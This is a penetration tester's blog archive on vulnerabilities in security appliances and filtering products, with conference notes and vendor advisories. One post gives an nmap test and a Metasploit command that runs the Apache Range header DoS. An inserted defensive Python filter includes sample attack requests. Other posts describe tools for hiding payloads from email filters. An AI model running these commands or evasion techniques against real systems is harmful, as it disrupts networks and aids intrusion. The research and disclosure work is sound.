insidetrust.com, by Ben<p align="right">IT Security, Penetration testing, and Exploit-development</p>
<strong>Speaking at BlackHat US 2014</strong> (2014-05-31)<br />
I found out this week that my talk on enumerating and bypassing email and web filtering solutions has been accepted for BlackHat US 2014.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQkmytlmDHisfMytfIsutukU4an8xfXIkrttPukCwuAfTp8l-xbjvK7Rj_qN6_qzQ_QKa7Qtca1ngJSMOcjZWhJiAr2N6UEAKdpqwUffJhOXbQR90o5GnEq2PqOGUzechaJL5QxRMg3D4/s1600/blackhat.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQkmytlmDHisfMytfIsutukU4an8xfXIkrttPukCwuAfTp8l-xbjvK7Rj_qN6_qzQ_QKa7Qtca1ngJSMOcjZWhJiAr2N6UEAKdpqwUffJhOXbQR90o5GnEq2PqOGUzechaJL5QxRMg3D4/s1600/blackhat.JPG" height="146" width="320" /></a></div>
<br />
Here is a synopsis of my talk; it should be fun:<br />
<a href="https://www.blackhat.com/us-14/briefings.html#Williams">https://www.blackhat.com/us-14/briefings.html#Williams</a><br />
<br />
<br />
<br />
<strong>Hacking Email Filtering Appliances and Solutions - talks and tools</strong> (2014-03-25)<br />
I recently presented at Hackcon in Oslo, Norway, and at IT-Defense in Cologne, Germany, on the subject of "Hacking Email Filtering Appliances and Solutions".<br />
<br />
I briefly talked about some of the vulnerabilities I have previously found in Security Appliances, but talked in much more detail about recent research I have been developing for automated enumeration of email filtering services, products and policies (offensively, from the outside).<br />
<br />
Specifically, I talked about the enumeration techniques, and how this information could be used by malicious hackers to improve the efficiency of attacks against organizations. This type of automated reconnaissance can be combined with phishing attacks to quickly find and exploit vulnerable systems and users.<br />
<br />
Feedback from both these talks has been very good, and I am planning to release tools, and a white paper over the coming months.<br />
<div>
<br /></div>
I have been developing MailFEET, an enumeration tool with defense in mind, to enable organizations to identify weaknesses in their email filtering solutions. I have tested this tool with hundreds of domains to find some of the most common policy bypasses, and we have used these techniques with several of our customers recently to help them identify and close such loopholes.<br />
<br />
In terms of the loopholes, well, there are a lot, and I will probably talk about that more in a future post, but for a brief three bullet-point summary:<br />
<br />
<ul>
<li>Most email filtering solutions do not block embedded executable code or scripts in office documents.</li>
<li>Almost all companies tested had no filtering for common encrypted attachments (password protected office documents or zip files for example).</li>
<li>A small but significant percentage of organizations had direct bypasses in their email filtering (i.e. in around 5% to 10% of cases, it was possible to deliver directly to relays or mail-servers behind the filtering solution, by enumerating the relevant IPs from SMTP header information).</li>
</ul>
<br />
Tools I am currently working on include:<br />
<br />
<b>MailFEET</b> - Mail Filter External Enumeration Tool - For finding vulnerable email filtering products, and flaws or bypasses in email filtering policy (written in Python and SQLite) - This just needs tidying up a bit before release.<br />
<br />
<b>DAPHT</b> - Document and Archive Payload Hiding Tool - For automatically embedding test payloads in a variety of formats, to hide them from most email and web filtering solutions (written in C#).<br />
<br />
<b>WebFEET</b> - Web Filter External Enumeration Tool - For finding vulnerable web filtering products, and flaws or bypasses in web filtering policy (early days of a work in progress - probably will be mainly JavaScript, PHP and SQLite).<br />
<br />
<br />
<br />
<strong>Athcon 2013</strong> (2013-06-07)<br />
I am just on my way back from presenting at Athcon 2013 – the premier IT Security conference in Greece.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRLZ3WAhyphenhyphenkzhZHcPiIuEiLJLRuhNJIFwCQeUByrqMzB8ncK4roY-MS1LkUNQ8WcvU_TrJJg_uKzBCGGwwB9S06F3gYD3t1WwGfQMgaPhmd6izgoiBPFkQaz7VCU-ManRCBKUAQcJfHbvU/s1600/BME1F77CIAIL1r3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="475" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRLZ3WAhyphenhyphenkzhZHcPiIuEiLJLRuhNJIFwCQeUByrqMzB8ncK4roY-MS1LkUNQ8WcvU_TrJJg_uKzBCGGwwB9S06F3gYD3t1WwGfQMgaPhmd6izgoiBPFkQaz7VCU-ManRCBKUAQcJfHbvU/s640/BME1F77CIAIL1r3.jpg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: center;">
<a href="http://www.athcon.org/">http://www.athcon.org/</a></div>
<br />
It was my first time at Athcon, but I have to say that I was impressed. The organisers did a great job with the venue and facilities, and chose speakers who had a great mix of content and technical depth.<br />
<br />
I presented my research on “Hacking Security Appliances” (which I have previously presented at BlackHat Europe, and Dublin Source earlier this year). That’s probably my last time presenting that particular material, as I want to keep things fresh and I'm currently working on various ideas I have for interesting new research.<br />
<br />
For reference my base slides and white-paper for the material are here:<br />
<a href="https://media.blackhat.com/eu-13/briefings/B_Williams/bh-eu-13-hacking-appliances-bwilliams-wp.pdf">https://media.blackhat.com/eu-13/briefings/B_Williams/bh-eu-13-hacking-appliances-bwilliams-wp.pdf</a><br />
<a href="https://media.blackhat.com/eu-13/briefings/B_Williams/bh-eu-13-hacking-appliances-bwilliams-slides.pdf">https://media.blackhat.com/eu-13/briefings/B_Williams/bh-eu-13-hacking-appliances-bwilliams-slides.pdf</a><br />
<br />
I saw good solid presentations from other speakers including the following:<br />
<br />
Max Sobell - Security of NFC wallets<br />
Michele Orru - Using BeEf for custom shellcode and inter-protocol attacks<br />
Jurriaan Bremer - Automated de-obfuscation of android apps and malware<br />
Kostas Papapanagiotou - History of OWASP Top 10<br />
<div>
<br /></div>
(and also had a good meal out in Athens last night, with some of the other speakers, which was great fun)<br />
<br />
Athcon also had a “capture the flag” (CTF) competition hosted by Symantec (unfortunately I didn't get time to take part, but it seemed to be very popular).<br />
<br />
All in all a great conference that I would like to attend (and speak there) again.<br />
<div>
<br /></div>
<br />
<strong>BlackHat EU this week</strong> (2013-03-12)<br />
I am looking forward to speaking at BlackHat EU again on Thursday of this week. I will be talking on the subject of "Hacking Appliances: Ironic exploits in security products", which is an area of research I have particularly enjoyed.<br />
<br />
<a href="http://www.blackhat.com/eu-13/schedule/briefings-14.html">http://www.blackhat.com/eu-13/schedule/briefings-14.html</a><br />
<br />
In short, I will be discussing some of the vulnerabilities I have escalated to various vendors of popular Security Appliances during 2012, and demonstrating how these vulnerabilities could be exploited in realistic scenarios.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTMPfrvYUsObvG1g6o1T0J5SR-3dcn-iDps9kLja9Nsgd3ibu07Lbf0IQVq4Dic6WWTjWv_YRde6n9YsAnBroapsvUkahYTYC-ExwwC93P7GezP279tAnjR-c6JtuPNf0uNzj0u_RnV_s/s1600/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTMPfrvYUsObvG1g6o1T0J5SR-3dcn-iDps9kLja9Nsgd3ibu07Lbf0IQVq4Dic6WWTjWv_YRde6n9YsAnBroapsvUkahYTYC-ExwwC93P7GezP279tAnjR-c6JtuPNf0uNzj0u_RnV_s/s320/Capture.JPG" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
There will be some root shell, for those of us who like that sort of thing, but I think the most interesting aspect is that most of the vulnerabilities were typical <a href="https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project">OWASP Top 10</a> type issues, or other fairly basic misconfigurations, which could be found and exploited in a few days using typical attack techniques.<br />
<br />
People outside the Pentesting community find it surprising when I tell them that most popular Security Appliances I have looked at had fairly basic and rather easy to find vulnerabilities. Most of the products I looked at were popular and widely deployed, so the concerning thing is that companies using these products (and the vendors who produce them) were unaware that these products suffered from such issues.<br />
<br />
In regard to the irony: I have certainly seen some ironic issues over the past 18 months, for example:<br />
• A URL filter which could be fully compromised with a malicious URL<br />
• Email filtering products which could be fully compromised with malicious emails<br />
• A single-sign-on system where all the credentials could be extracted in an unauthenticated way<br />
• A firewall that could be fully compromised from the outside due to authentication-bypass<br />
• A secure remote access gateway which could give unauthenticated external attackers free and easy access to the internal network<br />
<br />
I showed some of these issues last year, and I will be showing a few more during my talk on Thursday.<br />
(by "fully compromised" I generally mean a root shell on the underlying operating system)<br />
<br />
<br />
<strong>Symantec have fixed some exploits in Symantec Message Filter</strong> (2012-06-27)<br />
Looks like Symantec have finally fixed some security issues I raised with them back in January 2012 for Symantec Message Filter 6.3.<br />
<br />
It took them six months, so I am not impressed with their patching-cycle, or their focus on IT Security generally (this is supposed to be a security product after all).<br />
<br />
Basically, as I described at BlackHat EU back in May 2012, this product-installer had versions of Tomcat and MySQL which were 7 years old, with default content and no patches (so the product had well-known third-party exploits right out of the box).<br />
<br />
Additionally (which I felt I couldn't describe at the time, because it was 0-day) there were session-management and information-disclosure issues in the administrative UI, plus Cross Site Request Forgery (CSRF) of administrative-functions and XSS.<br />
<br />
More detail is here:<br />
<a href="http://www.symantec.com/security_response/securityupdates/detail.jsp?suid=20120626_00&fid=security_advisory&pvid=security_advisory&year=2012">http://www.symantec.com/security_response/securityupdates/detail.jsp?suid=20120626_00&fid=security_advisory&pvid=security_advisory&year=2012</a><br />
<br />
The CVEs are:<br />
<br />
CVE-2012-0300<br />
CVE-2012-0301<br />
CVE-2012-0302<br />
CVE-2012-0303<br />
<br />
<strong>More on Exploiting Security Gateways</strong> (2012-06-21)<br />
Here is a quick update on some of my exploit-development research into finding exploits in Security Gateways.<br />
<br />
This is the video from my presentation at BlackHatEU 2012 back in May, which shows some typical examples of exploits I had found in the period from October 2011 to March 2012 (all of the issues in the demo videos have now been addressed).<br />
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/XfZS1iZ2PpY" width="420"></iframe>
</div>
<div style="text-align: center;">
<span style="font-size: xx-small;">(this video is around 40 minutes, and may take a minute or so to start depending on your connection)</span></div>
<br />
If you are interested in the technical side, the white-paper that went with this presentation can be found here:<br />
<a href="http://www.nccgroup.com/en/learning-research-centre/security-testing-audit-compliance-resources/white-papers/">http://www.nccgroup.com/en/learning-research-centre/security-testing-audit-compliance-resources/white-papers/</a><br />
<br />
Since then I have continued my research project, and to-date have found around 80 exploits (most of which are in Security Gateways, though I have also started to look at some other types of appliances as well). Fixes and updates have been released for at least 25 of these exploits so far, though the majority are still in the respective vendor's patch-cycle (this means that these products are improving, which is a positive outcome).<br />
<br />
Some vendors are very responsive, but a few vendors (especially Symantec and Barracuda) don't seem to be able to turn around fixes within a reasonable timeframe (Symantec still have not addressed serious issues I raised with them back in January 2012 - despite me chasing them). The good news is that many vendors address issues within a couple of months or so, and some within a few days - which is excellent!<br />
<br />
As the briefest of summaries: this research is continuing to uncover more and more similar issues, showing alarming trends in the insecurity of security-product Web UIs. For example:<br />
<br />
<div>
Almost all Security Gateway products had</div>
<ul>
<li>Unauthenticated information disclosure</li>
<li>XSS with session-hijacking</li>
</ul>
The majority had<br />
<ul>
<li>CSRF of admin functions</li>
<li>Command-injection</li>
<li>Privilege escalation</li>
</ul>
<div>
Several had</div>
<ul>
<li>Direct authentication-bypass</li>
<li>Stored out-of-band XSS and OSRF</li>
</ul>
<div>
A few had</div>
<ul>
<li>Gateway Denial-of-Service</li>
<li>There were a wide variety of more obscure issues</li>
</ul>
Also, the majority had brute-force password guessing issues (and though I considered this too basic for my research, it is also a big failure on the part of these software vendors).<br />
<br />
Basically speaking, almost all of the Security Gateways I looked at could be compromised by an attacker, and used as an entry point to break into corporate networks.<br />
<br />
More recently, and of particular interest I have been looking at ways of exploiting these systems via insecure backup/restore functions, using request forgery to perform arbitrary file-upload. I feel this is an interesting attack-vector because it usually results in a "root shell" - maybe I will do a post on that at some point to explain how the attack works.<br />
<br />
Anyway, there are plenty more similar products out there, so I will continue looking. If you have any suggestions of products you think I should look at (especially security appliances) let me know.<br />
<br />
<strong>BlackHat EU 2012 - Day two and three summaries</strong> (2012-03-16)<br />
<div>I have been enjoying myself at BlackHat Europe 2012, soaking up some of the leetness, absorbing some of the technologies I am less familiar with, meeting great people, and talking with them about things which really interest me - which is all good.<br />
<br />
<br />
<strong>BlackHat EU 2012 - Day two</strong></div><br />
My presentation seemed to go well, with several interested people coming up to ask various questions afterwards, maybe due to the fact that I described and showed around 10 exploits I recently discovered in common security products (all patched now BTW - but some very interesting, some creative, and several rather ironic - for example: "a spam that reconfigures the spam-filter", "a URL that owns the URL-filter").<br />
<br />
<br />
My favourite presentation of Day two was "Data mining a mountain of Vulnerabilities" with Chris Wysopal.<br />
<br />
This was quite a dry subject, but very well presented. Lots of data on vulnerabilities, with statistics on vulnerabilities sorted by application language, platform, horizontal and vertical markets (among many other things).<br />
<br />
Really interesting data, and something I feel that I might consult when doing application testing.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgX3A8GFHdODEgEdNLOmRSTwB3_oM9XGjYEY0_hgNJZid6hEremyvuSK_-48AK3CTmFkNzLWFza-XC29xxOVXIUnAYkfRfpzdXfITX48qmco9KdLdMcKE5dFQ3pV0AVd5L4yrC2Rmst-1w/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="377" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgX3A8GFHdODEgEdNLOmRSTwB3_oM9XGjYEY0_hgNJZid6hEremyvuSK_-48AK3CTmFkNzLWFza-XC29xxOVXIUnAYkfRfpzdXfITX48qmco9KdLdMcKE5dFQ3pV0AVd5L4yrC2Rmst-1w/s640/Capture.PNG" width="640" /></a></div><br />
Chris had some really interesting graphs, the one above showing clearly that most web-apps contain at least one of the most serious flaws.<br />
<br />
<strong>Day three</strong><br />
<br />
Some really interesting presentations today on mobile/smartphone security. It's hard to choose the best one really, as the following three were very good, and looked like the conclusions were based on very solid research (and many hours of work).<br />
<br />
<ul><li>"Secure Password Managers" and "Military-Grade Encryption" on Smartphones: Oh Really? by Andrey Belenko + Dmitry Sklyarov</li>
<ul><li>Hmm... so password managers on smartphones are not very well coded - not a surprise really, but a lot of work has been done by these guys to review some of the most popular ones and find some bugs</li>
</ul><li>Apple vs. Google Client Platforms by Felix 'FX' Lindner</li>
<ul><li>A great talk this, delivered in FX's highly amusing style</li>
</ul><li>The Mobile Exploit Intelligence Project by Dan Guido + Mike Arpaia</li>
<ul><li>Interesting perspective from academia on the stats behind mobile exploits; it seems that the hype might be just hype (at least on the iOS platform, more potential on Android though, but still, not a great deal of real platform-pwnage happening)</li>
</ul></ul><br />
Anyway, I am in the airport on the way home, and it has been a very good week...<br />
<div></div>
<br />
<strong>McAfee Security Gateway patched this week for the issues I reported</strong> (2012-03-15)<br />
Fair play to McAfee for fixing these issues, giving an accurate description of the issues and crediting me with the discovery. This is probably one of the best customer notifications I have seen from the vendors I have dealt with during my research project.<br />
<br />
<a href="https://kc.mcafee.com/corporate/index?page=content&id=SB10020">https://kc.mcafee.com/corporate/index?page=content&id=SB10020</a><br />
<br />
<br />
<strong>Affected Software:</strong> McAfee Email and Web Security 5.x, McAfee Email Gateway 7.0<br />
<br />
<br />
<strong>NGS00153 – Reflected XSS</strong><br />
McAfee Email and Web Security Appliance Software 5.x / McAfee Email Gateway 7.0 is prone to reflected XSS, allowing an attacker to gain session tokens and run arbitrary JavaScript in the context of the administrator's browser and the McAfee Security Appliance Management Console/Dashboard.<br />
<br />
<strong>NGS00154 – Logout Failure <span style="color: #cc0000; font-size: x-small;">(I would have called this session-management issues, but whatever)</span></strong><br />
When an administrator closes the Management Console/Dashboard without clicking logout and returns to the Dashboard later, they appear to be logged out; however, this is simply the state of the JavaScript in their browser, and the session-token is still active on the server-side. If an attacker gains a session-cookie (perhaps using XSS, or by some other means), they can make a dummy login attempt (with a dummy password) and simply edit the (failure) response. They will then be logged in, and can use the Dashboard as if they had logged in as the administrator.<br />
<br />
<strong>NGS00155 – Password Reset issue</strong> <br />
Any logged-in user can bypass controls to reset passwords of other administrators.<br />
<br />
<strong>NGS00156 – Session Disclosure</strong><br />
Active session tokens of other users are disclosed within the Dashboard.<br />
<br />
<strong>NGS00157 – Weak Encryption of Backups</strong><br />
Password hashes can be recovered from a system backup and easily cracked.<br />
<br />
<strong>NGS00158 – File Download Issue</strong><br />
Arbitrary file download is possible with a crafted URL, when logged in as any user.<br />
<br />
<strong>NGS00159 – File Content Leakage</strong><br />
File contents disclosure as if root user, when logged in as any user.<br />
<br />
<strong>BlackHat EU 2012 - Day one summary</strong> (2012-03-15)<br />
I am currently enjoying BlackHat Europe 2012.<br />
<br />
My favourite presentation for Day 1 was:<br />
<br />
<strong>Jeff Jarmoc - SSL/TLS interception proxies (and transitive trust)</strong><br />
Really interesting research (to me) as it was kind of adjacent to some of the research I have been doing, and Jeff has looked at some very similar products that I have, but from a different perspective.<br />
<br />
Jeff described his research into an issue that I have felt could be a problem (but that I hadn’t investigated, and he has done a great job with his investigation, so this answers some of the questions I had in the back of my mind ;o).<br />
<br />
Put simply; When companies implement content-security for encrypted web-traffic (anti-virus, exe-blocking and content analysis for HTTPS traffic) the way to do this is usually to get all the clients within the environment to trust the proxy’s CA cert. Then, traffic is decrypted on the proxy and scanned (the proxy handles the external encryption to the target site) and the traffic is then re-encrypted internally to the client (using the proxy’s trusted cert).<br />
<br />
The issue is; “What happens when there is a problem with the cert of the original target site?” and the answer is - “These issues are largely ignored, and the information is dropped, so that everything looks fine on the client-side”.<br />
<br />
To paraphrase, the reason given for dropping the ball here is that: “SSL was not designed to do this, and this solution is hard enough to implement as it is, so vendors of these products try to make the product set-up and management as easy as possible, and iron out any of these minor ‘issues’ by ignoring them”.<br />
<br />
However, this causes a big security hole because certificates that are spoofed, expired or revoked are often made to look like they are “fine and dandy” to the client – which from a security-perspective, in short, is crap.<br />
<br />
Great presentation Jeff!<br />
<br />
<br />
Quote of the day: “Humanity needs crime, otherwise we would have stomped it out by now.. and the internet needs crime too..”<br />
(Whitfield Diffie, philosophising about “life, the internet and everything”)<br />
<br />
<strong>Apache Range header DoS vulnerability can be a Security Gateway killer</strong> (2012-02-11)<br />
Linux-based appliance UIs can be vulnerable to a serious Denial of Service vulnerability. I am talking here about the Apache Range header DoS vulnerability from August 2011.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfwfgatwn4GbD2mguAZudLDgwYFqt2_M1hZR1LeUXPDZemcaz83EA1rPe8I8_UQApW5_eddoI0LObwjDWmlmOBLAmA4FlWWyNueZvdcO9WeETVVgoSMYb3NOgkHIxFnfgveQV1H9sdY6c/s1600/feather-small.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfwfgatwn4GbD2mguAZudLDgwYFqt2_M1hZR1LeUXPDZemcaz83EA1rPe8I8_UQApW5_eddoI0LObwjDWmlmOBLAmA4FlWWyNueZvdcO9WeETVVgoSMYb3NOgkHIxFnfgveQV1H9sdY6c/s1600/feather-small.gif" /></a></div><br />
This exploit works by making a series of HTTP requests with overlapping ranges in the "Range" or "Request-Range" request headers and results in memory and CPU exhaustion.<br />
<br />
For an unpatched Apache server, in many cases a remote unauthenticated attacker could exploit this issue to make the system unresponsive - with only a few packets.<br />
<br />
Now, usually this exploit relates to a webserver hosting a website (or multiple websites) so has a limited scope.<br />
<br />
However, in the case where the target is the product UI of a Security Gateway, this can mean that the Gateway becomes unresponsive, and if this is a multi-protocol Gateway or Firewall UI - the attacker could potentially disrupt network connectivity (affecting a whole network, rather than a single system).<br />
<br />
I have seen several instances recently where a Security Gateway completely froze up after a few dozen malicious packets, and the system required a hard-reset (power-cycle) to recover. All network traffic stopped, and the Web UI and even the console were completely unresponsive.<br />
<br />
In each of these cases, the Web UIs were often left exposed to the internet (a simple "Google Dork" found dozens of the affected product UIs exposed to the internet).<br />
<br />
The solution to this problem is simple: these products need to be patched. But it seems that various vendors of Security Gateways (and other appliances) are not keeping up with their patch-management, or are unaware of the problem.<br />
<br />
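Apache's advisory for this CVE (linked at the end of this post) recommended limiting the number of ranges per request as an interim measure. The following added example, which is not code from the original post, implements that kind of check as a small Python filter: it parses Range / Request-Range values, rejects requests with too many or overlapping ranges (the pattern the exploit relies on), and runs over constructed sample requests. The five-range threshold, the sample requests and the host name are assumptions.

```python
import re
from typing import List, Optional, Tuple

# Maximum number of byte ranges tolerated in one request.  Apache's interim
# mod_rewrite mitigation for CVE-2011-3192 rejected requests with more than a
# handful of ranges; five is the (assumed) threshold used here.
MAX_RANGES = 5

# One byte-range-spec: "first-last", "first-" (open-ended) or "-suffix".
_RANGE_SPEC = re.compile(r"^(\d*)-(\d*)$")

ByteRange = Tuple[Optional[int], Optional[int]]


def parse_byte_ranges(header_value: str) -> Optional[List[ByteRange]]:
    """Parse an HTTP/1.1 'bytes=' range set into (first, last) tuples.

    A suffix range such as '-500' is returned as (None, 500); an open-ended
    range such as '100-' is returned as (100, None).  Reversed ranges such as
    '5-0' are kept (the DoS pattern uses them), so they are still counted.
    Returns None when the value is not a syntactically valid bytes range set.
    """
    value = header_value.strip()
    if not value.lower().startswith("bytes="):
        return None
    ranges: List[ByteRange] = []
    for spec in value[len("bytes="):].split(","):
        m = _RANGE_SPEC.match(spec.strip())
        if not m:
            return None
        first, last = m.group(1), m.group(2)
        if not first and not last:          # "-" alone is meaningless
            return None
        ranges.append((int(first) if first else None,
                       int(last) if last else None))
    return ranges


def _overlaps(a: ByteRange, b: ByteRange, total_size: int) -> bool:
    """True when two ranges share at least one byte of a resource of
    total_size bytes (the size is needed to resolve suffix/open-ended ranges)."""
    def resolve(r: ByteRange) -> Tuple[int, int]:
        first, last = r
        if first is None:                   # suffix range: the last N bytes
            return max(total_size - last, 0), total_size - 1
        if last is None or last >= total_size:
            last = total_size - 1
        return first, last
    a0, a1 = resolve(a)
    b0, b1 = resolve(b)
    return a0 <= b1 and b0 <= a1


def classify_range_header(header_value: str, resource_size: int = 1_000_000,
                          max_ranges: int = MAX_RANGES) -> Tuple[str, str]:
    """Return ('allow' | 'reject', reason) for a Range / Request-Range value.

    The exploit sends many overlapping ranges, so the check rejects on either
    trigger: too many ranges, or any two ranges that overlap.  A single
    ordinary range, or a malformed value Apache would ignore anyway, passes.
    """
    ranges = parse_byte_ranges(header_value)
    if ranges is None:
        return "allow", "not a bytes range set"
    if len(ranges) > max_ranges:
        return "reject", f"{len(ranges)} ranges exceeds limit of {max_ranges}"
    for i in range(len(ranges)):
        for j in range(i + 1, len(ranges)):
            if _overlaps(ranges[i], ranges[j], resource_size):
                return "reject", f"ranges {ranges[i]} and {ranges[j]} overlap"
    return "allow", f"{len(ranges)} non-overlapping range(s)"


def scan_requests(raw_requests: List[str]) -> List[Tuple[str, str, str]]:
    """Apply the check to raw HTTP request texts; return (request line,
    verdict, reason) for every Range or Request-Range header found."""
    results = []
    for raw in raw_requests:
        lines = raw.split("\r\n")
        for line in lines[1:]:
            name, sep, value = line.partition(":")
            if sep and name.strip().lower() in ("range", "request-range"):
                verdict, reason = classify_range_header(value)
                results.append((lines[0], verdict, reason))
    return results


# Constructed sample traffic (not captured data): a legitimate resumed download,
# the overlapping-range pattern the post describes sent via Request-Range, and a
# short request whose two ranges overlap.
SAMPLE_REQUESTS = [
    "GET /images/logo.gif HTTP/1.1\r\nHost: gateway.example\r\n"
    "Range: bytes=1000-\r\n\r\n",
    "HEAD /images/logo.gif HTTP/1.1\r\nHost: gateway.example\r\n"
    "Request-Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7\r\n\r\n",
    "GET /video.bin HTTP/1.1\r\nHost: gateway.example\r\n"
    "Range: bytes=0-99,50-149\r\n\r\n",
]

if __name__ == "__main__":
    for request_line, verdict, reason in scan_requests(SAMPLE_REQUESTS):
        print(f"{verdict:6} {request_line}  ({reason})")
```

Note that whether a suffix range overlaps another range depends on the resource size, so a filter that sits in front of the server and does not know the size should treat the count limit as the primary control.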
This is an example of how to test for this issue (here using Nmap):<br />
<br />
(You need the nmap *.nse script from here if you want to test this <a href="http://nmap.org/nsedoc/scripts/http-vuln-cve2011-3192.html">http://nmap.org/nsedoc/scripts/http-vuln-cve2011-3192.html</a> )<br />
<br />
<span style="font-family: "Courier New", Courier, monospace; font-size: x-small;">nmap -Pn -sS --script http-vuln-cve2011-3192 -p T:(port here) (ip address here) --script-args http-vuln-cve2011-3192.path=(vulnerable resource here)</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace; font-size: x-small;">Starting Nmap 5.61TEST4 ( <a href="http://nmap.org/">http://nmap.org</a> ) at 2012-02-11 20:12 GMT<br />
Nmap scan report for (ip address)<br />
Host is up (0.22s latency).<br />
PORT STATE SERVICE<br />
(port)/tcp open https<br />
<span style="color: #cc0000;">| http-vuln-cve2011-3192: <br />
| VULNERABLE:<br />
| Apache byterange filter DoS<br />
| State: VULNERABLE<br />
| IDs: CVE:CVE-2011-3192 OSVDB:74721</span><br />
| Description:<br />
| The Apache web server is vulnerable to a denial of service attack when numerous<br />
| overlapping byte ranges are requested.<br />
| Disclosure date: 2011-08-19<br />
| References:<br />
| <a href="http://seclists.org/fulldisclosure/2011/Aug/175">http://seclists.org/fulldisclosure/2011/Aug/175</a><br />
| <a href="http://nessus.org/plugins/index.php?view=single&id=55976">http://nessus.org/plugins/index.php?view=single&id=55976</a><br />
| <a href="http://osvdb.org/74721">http://osvdb.org/74721</a><br />
|_ <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192</a><br />
Nmap done: 1 IP address (1 host up) scanned in 3.32 seconds</span><br />
<br />
(It is very important to get the URL of a vulnerable resource correct, otherwise you may miss the issue; GIFs work quite well, but try a few resources.)<br />
<br />
To be absolutely sure that the vulnerability is exploitable, it can be exploited with Metasploit (<span style="color: #cc0000;">make sure you do this in legal and test conditions, such as in a test lab or on a VM you own</span>).<br />
<br />
<span style="font-family: "Courier New", Courier, monospace; font-size: x-small;">/pentest/exploits/framework/msfcli auxiliary/dos/http/apache_range_dos RLIMIT=50 RHOST=(ip address here) RPORT=(port here) URI=(vulnerable resource here) E</span><br />
<br />
Here is some detail from Apache on how to address the problem:<br />
<a href="http://httpd.apache.org/security/CVE-2011-3192.txt">http://httpd.apache.org/security/CVE-2011-3192.txt</a><br />
<br />
...but if you are a customer using one of the affected appliances, you won't be able to fix this yourself. You will need to get in contact with your respective vendor, get them to "pull their finger out" with their patch-management, and then maybe wait a month or so before they fix it.<br />
<br />
<strong>An update on my research into attacking Security Gateways via the Web UI – and Blackhat Europe</strong> (2012-01-20)<br />
I haven't written much on my blog for the past few months. This is because I have been very busy with my exploit-development research.<br />
<br />
A while back I had the idea to combine web-attacks with Security Gateways, mix things up, and see what happens. This has been very productive, and a lot of fun.<br />
<br />
In short, over the past 4 months, I have raised 30+ PoC exploits with vendors of Security Gateways. I have looked at quite a few Gateway products, and discovered serious vulnerabilities in almost all of the ones I have investigated.<br />
<br />
Whilst Security Gateway products provide good security features for the protocols and services they protect, if a gateway product is not secure in itself, it can be attacked directly and compromised.<br />
<br />
If an attacker can gain control of an organization's gateway, they are in a very strong position for further attacks: sniffing traffic, man-in-the-middle attacks on the protocols the gateway is supposed to protect, disabling network protections, and pivoting to target other systems and users on the internal network.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT2BO2amIXd02-UU-HSuljW6NS2SUAOBZZy5lC4101dqyFMu1qUsTx-p1yUMF1M8CJ4sQSrjqOaNAs81bsK0OOMCFcKfvLKF3tbIHdvolYWOL7xHuVd63O8xYIYO7XVasfkDUrRwXvwdQ/s1600/Picture1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="325" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT2BO2amIXd02-UU-HSuljW6NS2SUAOBZZy5lC4101dqyFMu1qUsTx-p1yUMF1M8CJ4sQSrjqOaNAs81bsK0OOMCFcKfvLKF3tbIHdvolYWOL7xHuVd63O8xYIYO7XVasfkDUrRwXvwdQ/s400/Picture1.png" width="400" /></a></div><br />
<br />
<br />
We often take the security of security software for granted, assuming that because it comes from a company that understands security, the product itself is very likely to be secure.<br />
<br />
This assumption is frequently wrong for Security Gateway UIs: the developers who design, code and test the UI are usually not "security" people, and are more focused on UI design, functionality, usability, supportability and branding than on security.<br />
<br />
There is a huge variety of web application attacks that have historically been used against public-facing websites and their users. Many of these attacks transfer directly to web-based product UIs, and the impact is much greater when the UI belongs to a Security Gateway, because compromising the UI compromises the protections the gateway enforces.<br />
<br />
Most of the serious issues I have found in Security Gateway products have been caused by one or more of the following:<br />
<ul><li>Lack of input-validation (leading to attacks such as XSS and Command-injection)</li>
<li>Predictable URLs and parameters with no anti-CSRF token (and therefore CSRF)</li>
<li>Excessive privileges of running services</li>
<li>Direct file browsing</li>
<li>Session-management issues</li>
<li>Weak session-tokens</li>
<li>Password Guessing</li>
<li>Authentication bypass</li>
<li>Verbose information disclosure</li>
<li>Out-of-date 3rd party software</li>
<li>Arbitrary file upload</li>
<li>Standard installs with poor configurations</li>
<li>Trivial Denial of Service vulnerabilities</li>
</ul><br />
